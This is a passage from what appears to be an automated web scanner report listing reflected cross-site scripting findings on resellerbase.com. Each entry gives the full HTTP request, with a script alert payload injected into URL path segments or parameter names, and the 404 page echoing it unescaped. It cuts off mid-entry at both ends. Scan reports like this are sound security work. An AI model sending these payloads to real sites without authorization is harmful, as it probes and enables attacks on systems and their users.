Path:	/detail/9/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 14353<a>e0156cc33d8 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/search.php?keyword=search...&Submit3=Search&opt=214353<a>e0156cc33d8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/search.php?keyword=search...&Submit3=Search&opt=214353<a>e0156cc33d8 was not found on this server.</p>
...[SNIP]...

2.3750. http://www.resellerbase.com/detail/9/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3f0ff<script>alert(1)</script>5421184882d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3f0ff<script>alert(1)</script>5421184882d/9/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3f0ff<script>alert(1)</script>5421184882d/9/themes/ was not found on this server.</p>
...[SNIP]...

2.3751. http://www.resellerbase.com/detail/9/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 44966<script>alert(1)</script>5f0f1769aa3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/944966<script>alert(1)</script>5f0f1769aa3/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/944966<script>alert(1)</script>5f0f1769aa3/themes/ was not found on this server.</p>
...[SNIP]...

2.3752. http://www.resellerbase.com/detail/9/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 22109<script>alert(1)</script>fae4e3be4c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes22109<script>alert(1)</script>fae4e3be4c8/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes22109<script>alert(1)</script>fae4e3be4c8/ was not found on this server.</p>
...[SNIP]...

2.3753. http://www.resellerbase.com/detail/9/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f5691<script>alert(1)</script>e92533beb96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/?f5691<script>alert(1)</script>e92533beb96=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.3754. http://www.resellerbase.com/detail/9/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 87e8f<script>alert(1)</script>82e789d8d15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail87e8f<script>alert(1)</script>82e789d8d15/9/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail87e8f<script>alert(1)</script>82e789d8d15/9/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3755. http://www.resellerbase.com/detail/9/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2fff5<script>alert(1)</script>ec7e616f677 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/92fff5<script>alert(1)</script>ec7e616f677/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/92fff5<script>alert(1)</script>ec7e616f677/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3756. http://www.resellerbase.com/detail/9/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e1e8e<script>alert(1)</script>810a04b73b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themese1e8e<script>alert(1)</script>810a04b73b5/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themese1e8e<script>alert(1)</script>810a04b73b5/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3757. http://www.resellerbase.com/detail/9/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ccf7e<script>alert(1)</script>9e400ea698e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmosccf7e<script>alert(1)</script>9e400ea698e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmosccf7e<script>alert(1)</script>9e400ea698e/ was not found on this server.</p>
...[SNIP]...

2.3758. http://www.resellerbase.com/detail/9/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fe70f<script>alert(1)</script>693a56a8bc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/?fe70f<script>alert(1)</script>693a56a8bc6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/?fe70f<script>alert(1)</script>693a56a8bc6=1 was not found on this server.</p>
...[SNIP]...

2.3759. http://www.resellerbase.com/detail/9/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aa400<script>alert(1)</script>5391315d7d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailaa400<script>alert(1)</script>5391315d7d5/9/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailaa400<script>alert(1)</script>5391315d7d5/9/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3760. http://www.resellerbase.com/detail/9/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 625bd<script>alert(1)</script>4d1598eb751 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9625bd<script>alert(1)</script>4d1598eb751/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.3761. http://www.resellerbase.com/detail/9/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 96c50<script>alert(1)</script>6c9b64cbc8f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes96c50<script>alert(1)</script>6c9b64cbc8f/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes96c50<script>alert(1)</script>6c9b64cbc8f/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3762. http://www.resellerbase.com/detail/9/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eed94<script>alert(1)</script>b9621764639 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmoseed94<script>alert(1)</script>b9621764639/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmoseed94<script>alert(1)</script>b9621764639/images/ was not found on this server.</p>
...[SNIP]...

2.3763. http://www.resellerbase.com/detail/9/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 12b07<script>alert(1)</script>45c9801de69 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images12b07<script>alert(1)</script>45c9801de69/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images12b07<script>alert(1)</script>45c9801de69/ was not found on this server.</p>
...[SNIP]...

2.3764. http://www.resellerbase.com/detail/9/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c7a88<script>alert(1)</script>ab30268f0de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/?c7a88<script>alert(1)</script>ab30268f0de=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/?c7a88<script>alert(1)</script>ab30268f0de=1 was not found on this server.</p>
...[SNIP]...

2.3765. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2c366<script>alert(1)</script>ccd78918ab1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2c366<script>alert(1)</script>ccd78918ab1/9/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2c366<script>alert(1)</script>ccd78918ab1/9/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3766. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bf465<script>alert(1)</script>ddc2e85089f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9bf465<script>alert(1)</script>ddc2e85089f/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9bf465<script>alert(1)</script>ddc2e85089f/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3767. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 21679<script>alert(1)</script>c423102c26d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes21679<script>alert(1)</script>c423102c26d/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes21679<script>alert(1)</script>c423102c26d/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3768. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2568e<script>alert(1)</script>10002ef01dd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos2568e<script>alert(1)</script>10002ef01dd/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos2568e<script>alert(1)</script>10002ef01dd/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3769. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c85d5<script>alert(1)</script>50df8ab74ec was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/imagesc85d5<script>alert(1)</script>50df8ab74ec/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

